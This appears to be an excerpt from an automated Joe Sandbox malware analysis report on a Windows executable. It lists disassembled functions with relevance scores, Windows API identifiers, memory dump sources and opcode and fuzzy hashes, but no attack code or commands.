                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2398171386-0
                                                                                          • Opcode ID: 6680a8ae6a6522cd62912201e70e8bb28995b8f6d908c9164d6c450c0857e8b8
                                                                                          • Instruction ID: 4898fe112d6b0c16a5054d217edbb233b7eaef494a1a196903bad170624664b5
                                                                                          • Opcode Fuzzy Hash: 6680a8ae6a6522cd62912201e70e8bb28995b8f6d908c9164d6c450c0857e8b8
                                                                                          • Instruction Fuzzy Hash: 57519E62F0CB4299FF908BA5E8422BD23B2EB887A8F404635DE5D86798DF3C94459301
                                                                                          Function 00007FF6373D3F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 3659116390-0
                                                                                          • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                          • Instruction ID: 13b42b321aeba788877f0ca2784f13d362e3e4bd1fcbff1361b823ddbac14891
                                                                                          • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                          • Instruction Fuzzy Hash: 1851DF32A18A5189F710CF65E8443ACBBB1FB58B98F148135DE4E97B98DF38E14AD704
                                                                                          Function 00007FF6373C1E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                                          • String ID:
                                                                                          • API String ID: 262959230-0
                                                                                          • Opcode ID: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
                                                                                          • Instruction ID: 0c07c10f4658df147f217db56b36eda6a9181c2cd361bae0c5813287780531f6
                                                                                          • Opcode Fuzzy Hash: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
                                                                                          • Instruction Fuzzy Hash: 8D419DB2E0D6578AFB149F3298502B92295EF08BA5F544634EA6DC7BD5DF3CE141A300
                                                                                          Function 00007FF6373CF414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID:
                                                                                          • API String ID: 190572456-0
                                                                                          • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                          • Instruction ID: 975a74a48d801c0c81c25fcbee0a8f7fb8e1f380551afa5b56e3b57a8b3bbfae
                                                                                          • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                          • Instruction Fuzzy Hash: FE41D363F0EA63C1FA169B12A800AB56295BF54BD1F094535DF1DCBB58EF3CE540A340
                                                                                          Function 00007FF6373D56D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _set_statfp
                                                                                          • String ID:
                                                                                          • API String ID: 1156100317-0
                                                                                          • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                          • Instruction ID: a142c2998125e9a2c164acfe1b4799e8933b1fc5ad3da46b273d12af9c45e314
                                                                                          • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                          • Instruction Fuzzy Hash: AF118676E1CB0781F6541328E5463B911416F9A3B0F684634FA7ECA7D6DF7CA640720D
                                                                                          Function 00007FF6373BFE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                          • String ID:
                                                                                          • API String ID: 3621893840-0
                                                                                          • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                          • Instruction ID: dbe1fb85cfb6a7e25daa6ae3a7bb233e6c343e05e196325ef56ed5b73349771f
                                                                                          • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                          • Instruction Fuzzy Hash: 53F01221F3D95782F76097A1E455B762251FFE4B45F441030E54EC5A94DF3CE549E700
                                                                                          Function 00007FF6373C625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: __except_validate_context_recordabort
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 746414643-3733052814
                                                                                          • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                          • Instruction ID: 7203170209c4911aa3176dc92ce2c746711cb1fa1141c5808daa8a89b7e3832c
                                                                                          • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                          • Instruction Fuzzy Hash: A6717072A0C6A2CAE7608F25945077DBBA0FB05B8AF148136DA4C8BB89CF3CD595D741
                                                                                          Function 00007FF6373C80F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: $*
                                                                                          • API String ID: 3215553584-3982473090
                                                                                          • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                          • Instruction ID: 4304fdddfba90d0ba2a8c3cf9a5cccfc7ac2feb0679cbd91d998701fb9baad74
                                                                                          • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                          • Instruction Fuzzy Hash: F7513372D1CA678AF7658F2884493FC3BA1FB46B1AF141135D64A82399CF3CE681F605
                                                                                          Function 00007FF6373D1758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$StringType
                                                                                          • String ID: $%s
                                                                                          • API String ID: 3586891840-3791308623
                                                                                          • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                          • Instruction ID: 26c6cf5e2a6c72833aec63879062e47c38c73be7c0c6d3739956182f028af69f
                                                                                          • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                          • Instruction Fuzzy Hash: CE419232B19B968AFB618F26D8002A96391FF44BA8F494235EE1D877D5EF3CE4419304
                                                                                          Function 00007FF6373C66A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                          • String ID: csm
                                                                                          • API String ID: 2466640111-1018135373
                                                                                          • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                          • Instruction ID: f74bc6ee417b435cecd1e3577d2f33fafd51c99c2b86df7a4bada69d5de2ab1a
                                                                                          • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                          • Instruction Fuzzy Hash: D6517C72A1C76687E620AB16E54026E77A4FB88B91F540534EF8D87B56CF38E461DB00
                                                                                          Function 00007FF6373D4360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                          • String ID: U
                                                                                          • API String ID: 2456169464-4171548499
                                                                                          • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                          • Instruction ID: 00b7969cb8622df9f9732362913868d7b30e3eb828bb2ec938d0bd4d34f7410a
                                                                                          • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                          • Instruction Fuzzy Hash: 6441A022B1DA9182EB208F25E8443BAB7A0FB98794F444131EE4DC7798DF7CE451D744
                                                                                          Function 00007FF6373B90B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1429681911-3916222277
                                                                                          • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                          • Instruction ID: c583fbcef7de87db30a1a6e9cce1f9901e9d61fb88aa611de185629e1b4f89f8
                                                                                          • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                          • Instruction Fuzzy Hash: B3314A3660975286EB149F17B818A2AB7A1FB89FD1F404439EE4A83B54CF3CE449DB04
                                                                                          Function 00007FF6373AE870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InitializeCriticalSection.KERNEL32(?,?,?,00007FF6373B317F,?,?,00001000,00007FF63739E51D), ref: 00007FF6373AE8BB
                                                                                          • CreateSemaphoreW.KERNEL32(?,?,?,00007FF6373B317F,?,?,00001000,00007FF63739E51D), ref: 00007FF6373AE8CB
                                                                                          • CreateEventW.KERNEL32(?,?,?,00007FF6373B317F,?,?,00001000,00007FF63739E51D), ref: 00007FF6373AE8E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                          • String ID: Thread pool initialization failed.
                                                                                          • API String ID: 3340455307-2182114853
                                                                                          • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                          • Instruction ID: 3974d8f282af8fae74d3d5b3810938b94239e008b180d04e09d530cbc053fc15
                                                                                          • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                          • Instruction Fuzzy Hash: 2121A232E1E64286FB508F25D4557E936A2EF98B08F188034CA0D8A395DF7EA455D784
                                                                                          Function 00007FF6373B85E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDeviceRelease
                                                                                          • String ID:
                                                                                          • API String ID: 127614599-3916222277
                                                                                          • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                          • Instruction ID: e70dbd8377693b6b81947e29ca676cbbcc1abf0d5716fd670e8831da13a9e30a
                                                                                          • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                          • Instruction Fuzzy Hash: 2AE0C220B0D64682FB0867B6B98943A22A1AB4CBD0F158039DA1F83794DE3CC4C44300
                                                                                          Function 00007FF63739D1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                          • String ID:
                                                                                          • API String ID: 1137671866-0
                                                                                          • Opcode ID: 483e63eb08f7322889363060fe74b723844d18cde85ed25c35d568cc78bb09b9
                                                                                          • Instruction ID: 20c64086b01d7863187fa175209045df64578d64d403f29edffc5a37711161f2
                                                                                          • Opcode Fuzzy Hash: 483e63eb08f7322889363060fe74b723844d18cde85ed25c35d568cc78bb09b9
                                                                                          • Instruction Fuzzy Hash: C9A1BF62A2CA8681FA10DB65E8422FD7361FF96784F405231EA9D93BA9DF3CE544D700
                                                                                          Function 00007FF6373B0548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1452528299-0
                                                                                          • Opcode ID: 1e1ce1e09f3fcb1436f8a63924df09fd4fccf40d73dc660d5d1cbade07bd72dd
                                                                                          • Instruction ID: f93d8d12d8b4b93621d79624cf150f8828db05da696261a47d87ea250e415d7f
                                                                                          • Opcode Fuzzy Hash: 1e1ce1e09f3fcb1436f8a63924df09fd4fccf40d73dc660d5d1cbade07bd72dd
                                                                                          • Instruction Fuzzy Hash: 8B519F72F1CA4695FB009B74D4452FC2361EB89BD8F404236DA5C97BAAEE3CE544E344
                                                                                          Function 00007FF6373B9D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
